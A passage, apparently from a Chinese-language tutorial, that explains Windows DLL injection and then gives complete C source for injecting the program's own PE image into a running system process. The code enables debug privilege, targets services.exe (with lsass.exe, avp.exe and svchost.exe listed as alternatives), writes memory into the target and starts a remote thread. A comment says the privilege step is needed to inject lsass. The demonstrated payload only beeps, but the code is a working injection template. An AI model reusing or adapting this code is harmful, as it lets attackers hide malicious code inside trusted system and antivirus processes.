OK,现在目标进程也认识pszLibFileRemote了,但是pfnStartAddr好像不好办,我怎么可能知道LoadLibraryA在目标进程中的地址呢?其实Windows为我们解决了这个问题,LoadLibraryA这个函数是在Kernel32.dll这个核心DLL里的,而这个DLL很特殊,不管对于哪个进程,Windows总是把它加载到相同的地址上去。因此你的进程中LoadLibraryA的地址和目标进程中LoadLibraryA的地址是相同的(其实,这个DLL里的所有函数都是如此)。至此,DLL注入结束了。
/* 远程注入explorer.exe,不停Beep,注入完就退出。 */ #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #include <Shlwapi.h> #include <tchar.h> #pragma comment(lib,"Shlwapi.lib") #pragma comment(linker, "/BASE:0x14000000") //#define NoWindow #ifdef NoWindow #pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:main") #pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078") #pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR") #endif typedef int (__stdcall *fnMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT); typedef int (__stdcall *fnBeep)(int,int); #define ProcessName "services.exe"//"rundll32.exe"//"svchost.exe"//"explorer.exe"//"avp.exe"//"lsass.exe"// //■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ //根据进程名,获得进程ID DWORD GetProcessID(char *FileName) { HANDLE hProcess; PROCESSENTRY32 pe; BOOL bRet; //进行进程快照 hProcess=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //开始进程查找 bRet=::Process32First(hProcess,&pe); //循环比较,得出ProcessID while(bRet) { if(strcmp(FileName,pe.szExeFile)==0) return pe.th32ProcessID; else bRet=::Process32Next(hProcess,&pe); } //返回得到的ProcessID // printf("Process not found!\n"); return 9999; } //■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ //远程注入函数 void __stdcall RmoteThread() { HMODULE hMod,hMod2; fnMessageBoxA myMessageBoxA; fnBeep myBeep; char* path[MAX_PATH]; hMod = GetModuleHandle("user32.dll"); hMod2 = GetModuleHandle("kernel32.dll"); myMessageBoxA = (fnMessageBoxA)GetProcAddress(hMod, (LPCSTR)"MessageBoxA"); myBeep = (fnBeep)GetProcAddress(hMod2, (LPCSTR)"Beep"); /*for(int i=0;i<30;i++) { myBeep(800,400); } */ // while(1) for(int i=0;i<6;i++) { Beep(600,100); Sleep(200); } GetModuleFileName(NULL,(char*)path,MAX_PATH); // myMessageBoxA(NULL, (char*)path, NULL, 64); } //■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } //■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ ///说明: 插入代码,远程线程为RmoteThread() ///参数: Pid = 进程PID ///返回: 成功True,否则False bool InjectExe(DWORD Pid) { bool status = false; LPVOID pBaseAddr = NULL; HMODULE hMod = GetModuleHandle(NULL); LONG hNHOffset = PIMAGE_DOS_HEADER(hMod)->e_lfanew; HANDLE hThread, hProcess, hToken; DWORD cbImage; //cbImage=内存中整个PE映像体的尺寸 cbImage= PIMAGE_NT_HEADERS((DWORD)hMod + (DWORD)hNHOffset)->OptionalHeader.SizeOfImage; //重要,否则不能注入lsass OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, Pid); if (hProcess == NULL) { #ifdef debug MessageBoxA(NULL, "错误OpenProcess", NULL, 64); #endif goto Err; } //释放远程内存 VirtualFreeEx(hProcess, LPVOID(hMod), 0, MEM_RELEASE); //分配远程内存 pBaseAddr = VirtualAllocEx(hProcess, LPVOID(hMod), cbImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pBaseAddr == NULL) { #ifdef debug MessageBoxA(NULL, "VirtualAllocEx failed", NULL, 64); #endif goto Err; } //写进去,将本进程的整个PE体 全写进目标进程,够狠~ if (!WriteProcessMemory(hProcess, pBaseAddr, LPVOID(hMod), cbImage, NULL)) { #ifdef debug MessageBoxA(NULL, "WriteProcessMemory failed", NULL, 64); #endif goto Err; } hThread = CreateRemoteThread(hProcess, NULL, NULL, \ (LPTHREAD_START_ROUTINE)&RmoteThread, NULL, NULL, NULL); if (hThread == NULL) { #ifdef debug MessageBoxA(NULL, "CreateRemoteThread failed", NULL, 64); #endif goto Err; } // WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); CloseHandle(hProcess); status = TRUE; return status; //自己返回就行,不要VirtualFreeEx;,否则宿主就挂了! Err: if (pBaseAddr != NULL) VirtualFreeEx(hProcess, pBaseAddr, 0, MEM_RELEASE); if (hProcess != NULL) CloseHandle(hProcess); return status; } //■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ int main() { char aa[]="aBcDdddFFFF asfd"; strupr((char*)aa); printf(aa); if (!InjectExe(GetProcessID(ProcessName))) Beep(1800,500); return 0; }